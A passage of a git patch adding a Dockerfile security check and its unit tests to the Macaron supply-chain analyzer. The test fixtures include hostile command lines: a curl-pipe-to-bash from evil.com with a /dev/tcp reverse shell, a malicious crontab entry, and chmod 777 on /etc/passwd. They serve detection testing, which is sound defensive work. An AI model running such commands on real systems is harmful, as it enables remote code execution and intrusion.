as source copies entire build context including sensitive files", 15 + ) + + self._check_file_sensitivity("ADD", source) + + def _check_file_sensitivity(self, instruction: str, filepath: str) -> None: + """Check if file path contains sensitive information.""" + for sensitive_file in self.SENSITIVE_FILES: + if sensitive_file in filepath: + self._add_issue("MEDIUM", instruction, f"Potentially sensitive file being copied: {filepath}", 10) + break + + for critical_file in self.SECURITY_CRITICAL_FILES: + if critical_file in filepath: + self._add_issue("CRITICAL", instruction, f"Security-critical file being copied: {filepath}", 35) + break + + def _check_run_instruction(self, content: str) -> None: + """Check RUN instruction for malicious commands.""" + for pattern in self.MALICIOUS_RUN_PATTERNS: + if re.search(pattern, content, re.IGNORECASE): + self._add_issue("CRITICAL", "RUN", f"Potentially malicious command detected: {pattern}", 40) + + +class DockerfileSecurityCheck(BaseCheck): + """This check analyzes Dockerfiles for security vulnerabilities based on DFScan research.""" + + def __init__(self) -> None: + """Initialize instance.""" + check_id = "mcn_dockerfile_security_1" + description = """This check analyzes Dockerfiles for security vulnerabilities and best practices + based on DFScan research findings. It examines Docker instructions for potential security risks + including root user usage, risky port exposure, sensitive information leakage, unsafe volume mounts, + and malicious commands.""" + depends_on: list[tuple[str, CheckResultType]] = [] + eval_reqs = [ReqName.SCRIPTED_BUILD] + super().__init__( + check_id=check_id, + description=description, + depends_on=depends_on, + eval_reqs=eval_reqs, + result_on_skip=CheckResultType.FAILED, + ) + + def run_check(self, ctx: AnalyzeContext) -> CheckResultData: + """ + Implement the check in this method. + + Parameters + ---------- + ctx : AnalyzeContext + The object containing processed data for the target repo. + + Returns + ------- + CheckResultData + The result of the check. 
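+
+        Notes
+        -----
+        The aggregate risk score drives the outcome: a score of 100 or more
+        fails with high confidence, 50-99 fails with medium confidence, 1-49
+        passes with medium confidence, and 0 passes with high confidence.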
+ """ + result_tables: list[CheckFacts] = [] + + try: + # Find and read Dockerfile content + dockerfile_content = self._get_dockerfile_content(ctx) + if not dockerfile_content: + logger.debug("No Dockerfile found in repository") + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.FAILED) + + # Analyze the Dockerfile + analyzer = DockerfileSecurityAnalyzer() + issues, risk_score, base_image_name, base_image_version = analyzer.analyze_dockerfile_content( + dockerfile_content + ) + + # Determine confidence and result type based on risk score and issues + if risk_score >= 100: + result_type = CheckResultType.FAILED + confidence = Confidence.HIGH + elif risk_score >= 50: + result_type = CheckResultType.FAILED + confidence = Confidence.MEDIUM + elif risk_score > 0: + result_type = CheckResultType.PASSED + confidence = Confidence.MEDIUM + else: + result_type = CheckResultType.PASSED + confidence = Confidence.HIGH + + # Create detailed security issues dictionary + security_issues_dict = { + "total_issues": len(issues), + "risk_score": risk_score, + "issues_by_severity": {}, + "issues_by_instruction": {}, + "detailed_issues": issues, + } + + # Group issues by severity and instruction + for issue in issues: + severity = issue.get("severity", "UNKNOWN") + instruction = issue.get("instruction", "UNKNOWN") + + # Ensure the dicts are actually dicts before using 'in' + if not isinstance(security_issues_dict.get("issues_by_severity"), dict): + security_issues_dict["issues_by_severity"] = {} + if not isinstance(security_issues_dict.get("issues_by_instruction"), dict): + security_issues_dict["issues_by_instruction"] = {} + + issues_by_severity = security_issues_dict.get("issues_by_severity") + issues_by_instruction = security_issues_dict.get("issues_by_instruction") + + if not isinstance(issues_by_severity, dict): + issues_by_severity = {} + security_issues_dict["issues_by_severity"] = issues_by_severity + if not isinstance(issues_by_instruction, dict): + issues_by_instruction = {} + security_issues_dict["issues_by_instruction"] = issues_by_instruction + + if severity not in issues_by_severity: + issues_by_severity[severity] = 0 + issues_by_severity[severity] += 1 + + if instruction not in issues_by_instruction: + issues_by_instruction[instruction] = 0 + issues_by_instruction[instruction] += 1 + + # Create facts + facts = DockerfileSecurityFacts( + base_image_name=base_image_name, + base_image_version=base_image_version, + security_issues=security_issues_dict, + risk_score=risk_score, + issues_count=len(issues), + confidence=confidence, + ) + + result_tables.append(facts) + + return CheckResultData( + result_tables=result_tables, + result_type=result_type, + ) + + except (OSError, ValueError) as e: + logger.error("Error processing Dockerfile security check: %s", e) + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.UNKNOWN) + + def _get_dockerfile_content(self, ctx: AnalyzeContext) -> str | None: + """ + Get Dockerfile content from the repository. 
+ + Parameters + ---------- + ctx : AnalyzeContext + The analyze context containing repository information + + Returns + ------- + Optional[str] + The Dockerfile content as string, or None if not found + """ + # Try different ways to get the repository path + repo_path = None + + # Method 1: Check if there's a component with repository info + if hasattr(ctx, "component") and ctx.component: + if hasattr(ctx.component, "repository") and ctx.component.repository: + if hasattr(ctx.component.repository, "fs_path"): + repo_path = ctx.component.repository.fs_path + logger.debug("Found repo_path via component.repository.fs_path: %s", repo_path) + + # Common Dockerfile names + dockerfile_names = ["Dockerfile", "dockerfile", "Dockerfile.prod", "Dockerfile.dev"] + + # Ensure repo_path is not None before proceeding + if repo_path is None: + logger.debug("repo_path is None, cannot search for Dockerfile.") + return None + + # Check root directory first + for dockerfile_name in dockerfile_names: + dockerfile_path = os.path.join(repo_path, dockerfile_name) + if os.path.exists(dockerfile_path): + try: + with open(dockerfile_path, encoding="utf-8") as f: + content = f.read() + logger.info("Found Dockerfile at: %s", dockerfile_path) + return content + except (OSError, UnicodeDecodeError) as e: + logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e) + + # Search recursively for Dockerfiles (limit depth to avoid deep recursion) + max_depth = 3 + for root, dirs, files in os.walk(repo_path): + # Calculate current depth + depth = root[len(repo_path) :].count(os.sep) + if depth >= max_depth: + dirs[:] = [] # Don't recurse deeper + continue + + # Skip hidden directories and common non-source directories + dirs[:] = [d for d in dirs if not d.startswith(".") and d not in ["node_modules", "venv", "env"]] + + for file in files: + if file.lower().startswith("dockerfile"): + dockerfile_path = os.path.join(root, file) + try: + with open(dockerfile_path, encoding="utf-8") as f: + content = f.read() + logger.info("Found Dockerfile at: %s", dockerfile_path) + return content + except (OSError, UnicodeDecodeError) as e: + logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e) + + logger.info("No Dockerfile found in repository at path: %s", repo_path) + return None + + +registry.register(DockerfileSecurityCheck()) From 081a4c688130fc70a357fb06c0660977223e767b Mon Sep 17 00:00:00 2001 From: Achraf Maghous Date: Mon, 7 Jul 2025 15:00:39 +0100 Subject: [PATCH 3/3] feat: Creating unit tests for insecure_patterns_dockerfile_check Changes: -Added unit tests handling different Docker files Signed-off-by: Achraf Maghous --- ...test_insecure_patterns_dockerfile_check.py | 524 ++++++++++++++++++ 1 file changed, 524 insertions(+) create mode 100644 tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py diff --git a/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..dffd3e8ba --- /dev/null +++ b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py @@ -0,0 +1,524 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
+ +"""Module to test the Dockerfile security check.""" + +from pathlib import Path +from unittest.mock import Mock, patch + +import pytest + +from macaron.database.table_definitions import Repository +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultType, Confidence +from macaron.slsa_analyzer.checks.insecure_patterns_dockerfile_check import ( + DockerfileSecurityAnalyzer, + DockerfileSecurityCheck, + DockerfileSecurityFacts, +) +from tests.conftest import MockAnalyzeContext + + +class TestDockerfileSecurityAnalyzer: + """Test cases for DockerfileSecurityAnalyzer.""" + + analyzer = DockerfileSecurityAnalyzer() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + def test_analyze_empty_dockerfile(self) -> None: + """Test analyzing an empty Dockerfile.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content("") + assert len(issues) == 0 + assert risk_score == 0 + assert base_image == "unknown" + assert version == "unknown" + + def test_analyze_invalid_dockerfile(self) -> None: + """Test analyzing an invalid Dockerfile.""" + invalid_content = "THIS IS NOT VALID DOCKERFILE CONTENT {{{invalid json" + _, _, base_image, version = self.analyzer.analyze_dockerfile_content(invalid_content) + # Should handle parse errors gracefully + assert base_image == "unknown" + assert version == "unknown" + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_base_image", "expected_version", "min_risk_score"), + [ + pytest.param("FROM ubuntu:latest\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_latest_tag"), + pytest.param("FROM ubuntu\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_no_tag"), + pytest.param("FROM ubuntu:16.04\nRUN apt-get update", "ubuntu", "16.04", 25, id="test_from_old_image"), + pytest.param( + "FROM python:2.7-slim\nRUN pip install requests", + "python", + "2.7-slim", + 25, + id="test_from_deprecated_python", + ), + ], + ) + def test_from_instruction_analysis( + self, dockerfile_content: str, expected_base_image: str, expected_version: str, min_risk_score: int + ) -> None: + """Test FROM instruction analysis with various scenarios.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == expected_base_image + assert version == expected_version + assert risk_score >= min_risk_score + assert any(issue["instruction"] == "FROM" for issue in issues) + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_issue_count", "min_risk_score"), + [ + pytest.param("FROM ubuntu:20.04\nUSER root\nRUN apt-get update", 1, 30, id="test_user_root"), + pytest.param("FROM ubuntu:20.04\nUSER 0", 1, 30, id="test_user_numeric_root"), + pytest.param("FROM ubuntu:20.04\nUSER appuser", 0, 0, id="test_user_non_root"), + ], + ) + def test_user_instruction_analysis( + self, dockerfile_content: str, expected_issue_count: int, min_risk_score: int + ) -> None: + """Test USER instruction analysis.""" + issues, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + user_issues = [issue for issue in issues if issue["instruction"] == "USER"] + assert len(user_issues) == expected_issue_count + if expected_issue_count > 0: + assert risk_score >= min_risk_score + + @pytest.mark.parametrize( + ("expose_instruction", "expected_issues"), + [ + pytest.param("EXPOSE 22", ["22"], id="test_expose_ssh"), + pytest.param("EXPOSE 3306", ["3306"], id="test_expose_mysql"), 
+ pytest.param("EXPOSE 22 23", ["22", "23"], id="test_expose_multiple_risky"), + pytest.param("EXPOSE 999", ["privileged port"], id="test_expose_privileged"), + pytest.param("EXPOSE 80 443", [], id="test_expose_safe_ports"), + pytest.param("EXPOSE 8080/tcp", [], id="test_expose_with_protocol"), + pytest.param("EXPOSE 100-200", ["privileged port"], id="test_expose_port_range"), + ], + ) + def test_expose_instruction_analysis(self, expose_instruction: str, expected_issues: list[str]) -> None: + """Test EXPOSE instruction analysis with various port configurations.""" + dockerfile_content = f"FROM ubuntu:20.04\n{expose_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + expose_issues = [issue for issue in issues if issue["instruction"] == "EXPOSE"] + + if expected_issues: + assert len(expose_issues) >= len(expected_issues) + for expected in expected_issues: + assert any(expected in issue["issue"] for issue in expose_issues) + else: + assert len(expose_issues) == 0 + + @pytest.mark.parametrize( + ("env_content", "expected_keywords"), + [ + pytest.param("ENV DATABASE_PASSWORD=secret123", ["pass"], id="test_env_password"), + pytest.param( + "ENV API_KEY=abcd1234\nENV SESSION_TOKEN=xyz789", + ["key", "session"], # Both should be lowercase since content_lower is used + id="test_env_multiple_sensitive", + ), + pytest.param("ENV MAINTAINER_EMAIL=admin@example.com", ["Email address"], id="test_env_email"), + pytest.param("ENV NODE_ENV=production", [], id="test_env_safe"), + ], + ) + def test_env_instruction_analysis(self, env_content: str, expected_keywords: list[str]) -> None: + """Test ENV instruction analysis for sensitive information.""" + dockerfile_content = f"FROM ubuntu:20.04\n{env_content}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + env_issues = [issue for issue in issues if issue["instruction"] == "ENV"] + + if expected_keywords: + assert len(env_issues) >= len(expected_keywords) + for keyword in expected_keywords: + assert any(keyword.lower() in issue["issue"].lower() for issue in env_issues) + else: + assert len(env_issues) == 0 + + @pytest.mark.parametrize( + ("volume_instruction", "expected_risk_score"), + [ + pytest.param("VOLUME /var/run/docker.sock", 40, id="test_volume_docker_socket"), + pytest.param('VOLUME ["/etc/docker", "/root/.ssh"]', 80, id="test_volume_multiple_unsafe"), + pytest.param("VOLUME /proc", 40, id="test_volume_proc"), + pytest.param("VOLUME /data", 0, id="test_volume_safe"), + ], + ) + def test_volume_instruction_analysis(self, volume_instruction: str, expected_risk_score: int) -> None: + """Test VOLUME instruction analysis for unsafe mounts.""" + dockerfile_content = f"FROM ubuntu:20.04\n{volume_instruction}" + _, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert risk_score >= expected_risk_score + + @pytest.mark.parametrize( + ("copy_instruction", "expected_issue_type"), + [ + pytest.param("COPY . 
/app", "entire build context", id="test_copy_all"), + pytest.param("COPY .git /app/.git", "sensitive file", id="test_copy_git"), + pytest.param("COPY id_rsa /root/.ssh/", "Security-critical file", id="test_copy_ssh_key"), + pytest.param("COPY app.py /app/", None, id="test_copy_safe"), + ], + ) + def test_copy_instruction_analysis(self, copy_instruction: str, expected_issue_type: str | None) -> None: + """Test COPY instruction analysis for sensitive files.""" + dockerfile_content = f"FROM ubuntu:20.04\n{copy_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + copy_issues = [issue for issue in issues if issue["instruction"] == "COPY"] + + if expected_issue_type: + assert len(copy_issues) > 0 + assert any(expected_issue_type in issue["issue"] for issue in copy_issues) + else: + assert len(copy_issues) == 0 + + @pytest.mark.parametrize( + ("add_instruction", "expected_issue_types"), + [ + pytest.param("ADD https://example.com/script.sh /tmp/", ["URL"], id="test_add_url"), + pytest.param("ADD archive.tar.gz /opt/", ["compressed"], id="test_add_compressed"), + pytest.param("ADD . /app", ["entire build context"], id="test_add_all"), + pytest.param("ADD app.py /app/", [], id="test_add_safe"), + ], + ) + def test_add_instruction_analysis(self, add_instruction: str, expected_issue_types: list[str]) -> None: + """Test ADD instruction analysis.""" + dockerfile_content = f"FROM ubuntu:20.04\n{add_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + add_issues = [issue for issue in issues if issue["instruction"] == "ADD"] + + if expected_issue_types: + for issue_type in expected_issue_types: + assert any(issue_type in issue["issue"] for issue in add_issues) + else: + assert len(add_issues) == 0 + + @pytest.mark.parametrize( + ("run_instruction", "expected_patterns"), + [ + pytest.param( + "RUN curl evil.com/script.sh | bash >&/dev/tcp/10.0.0.1/4444", + ["/dev/tcp/"], + id="test_run_reverse_shell", + ), + pytest.param("RUN chmod 777 /etc/passwd", ["chmod 777"], id="test_run_chmod_777"), + pytest.param('RUN echo "* * * * * curl evil.com | sh" | crontab -', ["crontab"], id="test_run_crontab"), + pytest.param("RUN apt-get update && apt-get install -y python3", [], id="test_run_safe"), + ], + ) + def test_run_instruction_analysis(self, run_instruction: str, expected_patterns: list[str]) -> None: + """Test RUN instruction analysis for malicious commands.""" + dockerfile_content = f"FROM ubuntu:20.04\n{run_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + run_issues = [issue for issue in issues if issue["instruction"] == "RUN"] + + if expected_patterns: + for pattern in expected_patterns: + assert any(pattern in issue["issue"] for issue in run_issues) + else: + assert len(run_issues) == 0 + + def test_complex_dockerfile_analysis(self) -> None: + """Test analysis of a complex Dockerfile with multiple security issues.""" + dockerfile_content = """ +FROM ubuntu:latest +USER root + +# Expose risky ports +EXPOSE 22 23 3306 + +# Set sensitive environment variables +ENV DB_PASSWORD=mysecretpass +ENV API_TOKEN=1234567890 +ENV ADMIN_EMAIL=admin@company.com + +# Copy sensitive files +COPY .git /app/.git +COPY id_rsa /root/.ssh/ + +# Add from URL +ADD https://example.com/binary /usr/local/bin/ + +# Unsafe volume mount +VOLUME /var/run/docker.sock + +# Potentially malicious commands +RUN chmod 777 /tmp +RUN curl suspicious.com/install.sh | bash +""" + issues, risk_score, base_image, 
version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == "ubuntu" + assert version == "latest" + assert len(issues) > 10 + assert risk_score > 100 + + # Check for various issue types + issue_instructions = [issue["instruction"] for issue in issues] + assert "FROM" in issue_instructions + assert "USER" in issue_instructions + assert "EXPOSE" in issue_instructions + assert "ENV" in issue_instructions + assert "COPY" in issue_instructions + assert "ADD" in issue_instructions + assert "VOLUME" in issue_instructions + assert "RUN" in issue_instructions + + +class TestDockerfileSecurityCheck: + """Test cases for DockerfileSecurityCheck.""" + + check = DockerfileSecurityCheck() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + @pytest.mark.parametrize( + ("dockerfile_exists", "dockerfile_content", "expected_result"), + [ + pytest.param(False, None, CheckResultType.FAILED, id="test_no_dockerfile"), + pytest.param( + True, + "FROM ubuntu:20.04\nUSER appuser\nEXPOSE 8080", + CheckResultType.PASSED, + id="test_secure_dockerfile", + ), + pytest.param( + True, "FROM ubuntu:latest\nUSER root\nEXPOSE 22", CheckResultType.FAILED, id="test_insecure_dockerfile" + ), + ], + ) + def test_run_check_with_different_dockerfiles( + self, + mock_get_dockerfile_content: Mock, + dockerfile_exists: bool, + dockerfile_content: str | None, + expected_result: CheckResultType, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test run_check with different Dockerfile scenarios.""" + # Create mock context + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create a mock repository with fs_path + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a mock component with the repository + mock_component = Mock() + mock_component.repository = mock_repo + + if dockerfile_exists: + mock_get_dockerfile_content.return_value = dockerfile_content + else: + mock_get_dockerfile_content.return_value = None + + # Run the check + result = self.check.run_check(ctx) + + assert result.result_type == expected_result + + def test_run_check_no_component(self, tmp_path: Path, macaron_path: Path) -> None: + """Test run_check when component is None.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + assert len(result.result_tables) == 0 + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_run_check_with_subdirectory_dockerfile( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test finding Dockerfile in subdirectory.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create mock repository + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock the Dockerfile content + mock_get_dockerfile_content.return_value = "FROM node:16\nUSER node" + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.PASSED + assert len(result.result_tables) == 1 + + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + assert facts.base_image_name == "node" + assert facts.base_image_version == "16" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + 
@pytest.mark.parametrize( + ("risk_score", "expected_result_type", "expected_confidence"), + [ + pytest.param(0, CheckResultType.PASSED, Confidence.HIGH, id="test_no_risk"), + pytest.param(30, CheckResultType.PASSED, Confidence.MEDIUM, id="test_low_risk"), + pytest.param(60, CheckResultType.FAILED, Confidence.MEDIUM, id="test_medium_risk"), + pytest.param(120, CheckResultType.FAILED, Confidence.HIGH, id="test_high_risk"), + ], + ) + def test_risk_score_to_result_mapping( + self, + mock_get_dockerfile_content: Mock, + risk_score: int, + expected_result_type: CheckResultType, + expected_confidence: Confidence, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test that risk scores map to correct result types and confidence levels.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Create a Dockerfile that will produce the desired risk score + if risk_score == 0: + dockerfile_content = "FROM ubuntu:20.04\nUSER appuser" + elif risk_score == 30: + dockerfile_content = "FROM ubuntu:latest\nUSER root" + elif risk_score == 60: + dockerfile_content = "FROM ubuntu:latest\nUSER root\nEXPOSE 22" + else: # risk_score >= 100 + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 +ENV PASSWORD=secret +VOLUME /var/run/docker.sock +RUN chmod 777 /etc +""" + + # Mock the return value + mock_get_dockerfile_content.return_value = dockerfile_content + + result = self.check.run_check(ctx) + + assert result.result_type == expected_result_type + if result.result_tables: + facts = result.result_tables[0] + assert facts.confidence == expected_confidence + + def test_run_check_os_error_handling(self, tmp_path: Path, macaron_path: Path) -> None: + """Test error handling when OS error occurs.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a Dockerfile but make it unreadable + dockerfile_path = tmp_path / "Dockerfile" + dockerfile_path.write_text("FROM ubuntu:20.04") + + # Mock open to raise OSError + with patch("builtins.open", side_effect=OSError("Permission denied")): + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + + def test_check_metadata(self) -> None: + """Test check metadata and configuration.""" + # Use the public interface method to get check_id + + # The check_id is accessible via get_check_id method or similar + # For now, we'll just verify the check was properly initialized + assert isinstance(self.check, BaseCheck) + assert hasattr(self.check, "result_on_skip") + assert self.check.result_on_skip == CheckResultType.FAILED + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_security_issues_grouping( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test that security issues are properly grouped by severity and instruction.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock Dockerfile with multiple issues + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 3306 +ENV PASSWORD=secret +ENV TOKEN=abcd1234 +""" + mock_get_dockerfile_content.return_value = dockerfile_content + + 
result = self.check.run_check(ctx) + assert len(result.result_tables) > 0 + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + + security_issues = facts.security_issues + assert "total_issues" in security_issues + total_issues = security_issues.get("total_issues") + assert isinstance(total_issues, int) + assert total_issues > 0 + + assert "issues_by_severity" in security_issues + assert isinstance(security_issues["issues_by_severity"], dict) + assert len(security_issues["issues_by_severity"]) > 0 + + assert "issues_by_instruction" in security_issues + assert isinstance(security_issues["issues_by_instruction"], dict) + assert "FROM" in security_issues["issues_by_instruction"] + assert "USER" in security_issues["issues_by_instruction"] + assert "EXPOSE" in security_issues["issues_by_instruction"] + assert "ENV" in security_issues["issues_by_instruction"] + + +class TestDockerfileSecurityFacts: + """Test cases for DockerfileSecurityFacts ORM model.""" + + def test_facts_creation(self) -> None: + """Test creating DockerfileSecurityFacts instance.""" + security_issues = { + "total_issues": 3, + "risk_score": 45, + "issues_by_severity": {"HIGH": 1, "MEDIUM": 2}, + "issues_by_instruction": {"FROM": 1, "USER": 1, "EXPOSE": 1}, + "detailed_issues": [ + {"severity": "HIGH", "instruction": "USER", "issue": "Running as root", "risk_points": "30"} + ], + } + + facts = DockerfileSecurityFacts( + base_image_name="ubuntu", + base_image_version="20.04", + security_issues=security_issues, + risk_score=45, + issues_count=3, + confidence=0.8, + ) + + assert facts.base_image_name == "ubuntu" + assert facts.base_image_version == "20.04" + assert facts.risk_score == 45 + assert facts.issues_count == 3 + assert facts.confidence == 0.8 + assert facts.security_issues["total_issues"] == 3 + assert facts.security_issues["risk_score"] == 45
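
A minimal sketch of how the new analyzer can be exercised on its own, assuming
the module path introduced in PATCH 2/3 (the expected score follows the risk
points hard-coded in the analyzer: 15 for a 'latest' tag, 30 for a root user,
25 for exposing SSH):

    from macaron.slsa_analyzer.checks.insecure_patterns_dockerfile_check import (
        DockerfileSecurityAnalyzer,
    )

    # A deliberately insecure, hypothetical Dockerfile.
    DOCKERFILE = "FROM ubuntu:latest\nUSER root\nEXPOSE 22\n"

    analyzer = DockerfileSecurityAnalyzer()
    issues, risk_score, image, tag = analyzer.analyze_dockerfile_content(DOCKERFILE)

    assert image == "ubuntu" and tag == "latest"
    # 15 (latest tag) + 30 (root user) + 25 (risky port 22) = 70, so the check
    # would fail with medium confidence under the thresholds in run_check.
    assert risk_score == 70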